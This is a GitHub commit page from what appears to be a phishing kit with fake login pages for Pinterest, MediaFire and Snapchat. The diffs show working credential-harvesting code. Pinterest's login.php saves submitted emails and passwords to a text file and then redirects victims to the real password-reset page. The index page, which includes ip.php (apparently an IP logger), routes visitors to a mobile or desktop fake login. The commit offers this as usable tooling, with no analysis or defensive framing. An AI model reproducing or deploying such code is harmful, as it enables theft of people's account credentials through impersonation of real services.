Skip to content

Commit e8dbdd7

Browse files
committed
Updated & removed offline css
1 parent b31f41f commit e8dbdd7

File tree

16 files changed

+2622
-8039
lines changed

16 files changed

+2622
-8039
lines changed

.sites/mediafire/favicon.ico

10.6 KB
Binary file not shown.

.sites/mediafire/login.html

Lines changed: 64 additions & 154 deletions
Large diffs are not rendered by default.

.sites/pinterest/favicon.png

1.67 KB
Loading

.sites/pinterest/index.php

Lines changed: 9 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,9 @@
1-
<?php
2-
include 'ip.php';
3-
header('Location: signin.php');
4-
exit
5-
?>
1+
<?php include 'ip.php';?>
2+
<script type="text/javascript">
3+
if (screen.width <= 699) {
4+
document.location = "mobile.html";
5+
}
6+
else {
7+
document.location = "login.html";
8+
}
9+
</script>

.sites/pinterest/login.html

Lines changed: 1705 additions & 0 deletions
Large diffs are not rendered by default.

.sites/pinterest/login.php

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
<?php
2-
file_put_contents("usernames.txt", "Pinterest Username: " . $_POST['id'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
2+
file_put_contents("usernames.txt", "Pinterest Username: " . $_POST['email'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
33
header('Location: https://www.pinterest.com/password/reset/');
44
exit();
55
?>

.sites/pinterest/mobile.html

Lines changed: 196 additions & 0 deletions
Large diffs are not rendered by default.

.sites/pinterest/signin.php

Lines changed: 0 additions & 512 deletions
This file was deleted.

.sites/snapchat/favicon.png

2.69 KB
Loading

.sites/snapchat/icon.svg

Lines changed: 50 additions & 0 deletions
Loading

0 commit comments

Comments
 (0)